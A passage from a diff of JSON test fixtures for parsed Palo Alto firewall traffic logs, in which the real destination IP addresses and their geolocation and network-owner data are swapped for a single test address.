States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031608400Z", + "original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:40.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -5446,25 +5503,30 @@ "destination": { "nat": { "port": 4282, - "ip": "199.167.55.52" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Sunnyvale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0144, - "lat": 37.386 + "lon": 125.3228, + "lat": 43.88 + } + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" } }, "port": 4282, "bytes": 0, - "packets": 0, - "ip": "199.167.55.52" + "ip": "175.16.199.1", + "packets": 0 }, "rule": { "name": "new_outbound_from_trust" @@ -5482,7 +5544,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -5497,7 +5559,7 @@ "destination": { "nat": { "port": 4282, - "ip": "199.167.55.52" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -5519,7 +5581,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:WSYAeVnYXY4WmfLFYEEo/atQJE8=" + "community_id": "1:QLpzIj2P/pM1IPhxoQgvo1NvlF4=" } }, "sequence_number": 32091145, @@ -5539,8 +5601,8 @@ ], "network": { "community_id": [ - "1:wFD93203ukPDpbZjVJE5SAMYrw4=", - "1:WSYAeVnYXY4WmfLFYEEo/atQJE8=" + "1:22CvovQQDhMcaR2aY+8zyK8hACA=", + "1:QLpzIj2P/pM1IPhxoQgvo1NvlF4=" ], "transport": "tcp", "application": "incomplete", @@ -5580,14 +5642,14 @@ ], "ip": [ "192.168.15.224", - "199.167.55.52", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941907254Z", - "original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031613700Z", + "original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:40.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -5610,30 +5672,29 @@ "destination": { "nat": { "port": 17472, - "ip": "199.167.52.219" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Sunnyvale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0144, - "lat": 37.386 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 54538, + "number": 4837, "organization": { - "name": "PALO ALTO NETWORKS" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 17472, "bytes": 2316, - "ip": "199.167.52.219", + "ip": "175.16.199.1", "packets": 9 }, "rule": { @@ -5652,7 +5713,7 @@ "packets": 11, "ip": "192.168.15.224" }, - "message": "192.168.15.224,199.167.52.219,192.168.1.63,199.167.52.219,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -5667,7 +5728,7 @@ "destination": { "nat": { "port": 17472, - "ip": "199.167.52.219" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", @@ -5689,7 +5750,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:XrQuj5ypAzAqGAy0lpIvWQVVZ2E=" + "community_id": "1:Gk7uyZrTczUbrHn/2IrftpQXmRo=" } }, "sequence_number": 32091146, @@ -5709,8 +5770,8 @@ ], "network": { "community_id": [ - "1:9oIDq1tuilAK1JGhtfp35vZpz4w=", - "1:XrQuj5ypAzAqGAy0lpIvWQVVZ2E=" + "1:nHM1z1SSNdcNZLyG13Mqi3kJU1k=", + "1:Gk7uyZrTczUbrHn/2IrftpQXmRo=" ], "transport": "tcp", "application": "tanium", @@ -5750,14 +5811,14 @@ ], "ip": [ "192.168.15.224", - "199.167.52.219", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941911018Z", - "original": "Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,199.167.52.219,192.168.1.63,199.167.52.219,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031619300Z", + "original": "Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:42.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -5780,30 +5841,29 @@ "destination": { "nat": { "port": 443, - "ip": "52.71.117.196" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 13966, - "ip": "52.71.117.196", + "ip": "175.16.199.1", "packets": 19 }, "rule": { @@ -5822,7 +5882,7 @@ "packets": 19, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.71.117.196,192.168.1.63,52.71.117.196,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -5837,7 +5897,7 @@ "destination": { "nat": { "port": 443, - "ip": "52.71.117.196" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", @@ -5859,7 +5919,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:EG9O/WtvoWuYwaB1MXJTgr43kac=" + "community_id": "1:A8ZPiK3JI+oWJOzzVdsg8jXl6O4=" } }, "sequence_number": 32091147, @@ -5879,8 +5939,8 @@ ], "network": { "community_id": [ - "1:lrruE+4dZreV0/+v9V1CpxRnfsE=", - "1:EG9O/WtvoWuYwaB1MXJTgr43kac=" + "1:j9qImNtMOJSwp6qNPrLrqmy50YY=", + "1:A8ZPiK3JI+oWJOzzVdsg8jXl6O4=" ], "transport": "tcp", "application": "ssl", @@ -5920,14 +5980,14 @@ ], "ip": [ "192.168.15.224", - "52.71.117.196", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 4000000000, - "ingested": "2021-09-08T12:40:05.941914551Z", - "original": "Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,52.71.117.196,192.168.1.63,52.71.117.196,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031624700Z", + "original": "Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:42.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -5950,27 +6010,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 244, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -5989,7 +6051,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -6004,7 +6066,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -6026,7 +6088,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:eI0W7/EQJgRBimA1ZM4XVOSKMqo=" + "community_id": "1:dU0K6PPF6c/n+bJEBuJWSB9TvH4=" } }, "sequence_number": 32091148, @@ -6046,8 +6108,8 @@ ], "network": { "community_id": [ - "1:b/0kdGUcINh0ryiR0w0QTg0t0jQ=", - "1:eI0W7/EQJgRBimA1ZM4XVOSKMqo=" + "1:mWbN4QHKVTUC68wg5wKOivMQ8W8=", + "1:dU0K6PPF6c/n+bJEBuJWSB9TvH4=" ], "transport": "udp", "application": "dns", @@ -6087,14 +6149,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941918069Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031630Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -6117,27 +6179,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 205, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -6156,7 +6220,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -6171,7 +6235,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -6193,7 +6257,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:uSrPYHIl4eJpdC+J0IAMuGStuNc=" + "community_id": "1:MwQQDOUiYF37dHofLv1bDnJVK20=" } }, "sequence_number": 32091149, @@ -6213,8 +6277,8 @@ ], "network": { "community_id": [ - "1:SsNvr7qdck7W52PZqREypGPIglo=", - "1:uSrPYHIl4eJpdC+J0IAMuGStuNc=" + "1:I02So92wktIGhyngyvODK1CjYE0=", + "1:MwQQDOUiYF37dHofLv1bDnJVK20=" ], "transport": "udp", "application": "dns", @@ -6254,14 +6318,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941921525Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031635500Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -6284,30 +6348,29 @@ "destination": { "nat": { "port": 443, - "ip": "35.186.194.41" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 2302, - "ip": "35.186.194.41", + "ip": "175.16.199.1", "packets": 20 }, "rule": { @@ -6326,7 +6389,7 @@ "packets": 24, "ip": "192.168.15.224" }, - "message": "192.168.15.224,35.186.194.41,192.168.1.63,35.186.194.41,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -6341,7 +6404,7 @@ "destination": { "nat": { "port": 443, - "ip": "35.186.194.41" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -6363,7 +6426,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:djhBHAw6H+Q9Bcz6i7V+GTrjtzA=" + "community_id": "1:5htp8jawo3huELq1UH1p4sEtjb0=" } }, "sequence_number": 32091150, @@ -6383,8 +6446,8 @@ ], "network": { "community_id": [ - "1:oy06sQtSbOzvWgK/dr7N5HKE5Ng=", - "1:djhBHAw6H+Q9Bcz6i7V+GTrjtzA=" + "1:23S1gp3CDXG+HkgVhd5LhRLuB4M=", + "1:5htp8jawo3huELq1UH1p4sEtjb0=" ], "transport": "tcp", "application": "ssl", @@ -6424,14 +6487,14 @@ ], "ip": [ "192.168.15.224", - "35.186.194.41", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 8000000000, - "ingested": "2021-09-08T12:40:05.941924959Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.194.41,192.168.1.63,35.186.194.41,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031640800Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -6454,25 +6517,29 @@ "destination": { "nat": { "port": 443, - "ip": "35.201.124.9" + "ip": "175.16.199.1" }, "geo": { "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Asia Pacific Region", + "region_name": "Jilin", "location": { - "lon": 105.0, - "lat": 35.0 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 6757, - "ip": "35.201.124.9", + "ip": "175.16.199.1", "packets": 41 }, "rule": { @@ -6491,7 +6558,7 @@ "packets": 63, "ip": "192.168.15.224" }, - "message": "192.168.15.224,35.201.124.9,192.168.1.63,35.201.124.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -6506,7 +6573,7 @@ "destination": { "nat": { "port": 443, - "ip": "35.201.124.9" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -6528,7 +6595,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:hIY5A8O11VWtEfpYG2l5voTvbVQ=" + "community_id": "1:3Xj5Loungg41BtyuN39Aku/fPSU=" } }, "sequence_number": 32091151, @@ -6548,8 +6615,8 @@ ], "network": { "community_id": [ - "1:DBvAD0JZYsb+pmUJkhTQYOcLJls=", - "1:hIY5A8O11VWtEfpYG2l5voTvbVQ=" + "1:7/bzJjfMyNLtPtSPbZS7ngdb7jk=", + "1:3Xj5Loungg41BtyuN39Aku/fPSU=" ], "transport": "tcp", "application": "ssl", @@ -6589,14 +6656,14 @@ ], "ip": [ "192.168.15.224", - "35.201.124.9", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 8000000000, - "ingested": "2021-09-08T12:40:05.941928494Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.124.9,192.168.1.63,35.201.124.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031646300Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -6619,30 +6686,29 @@ "destination": { "nat": { "port": 443, - "ip": "100.24.131.237" + "ip": 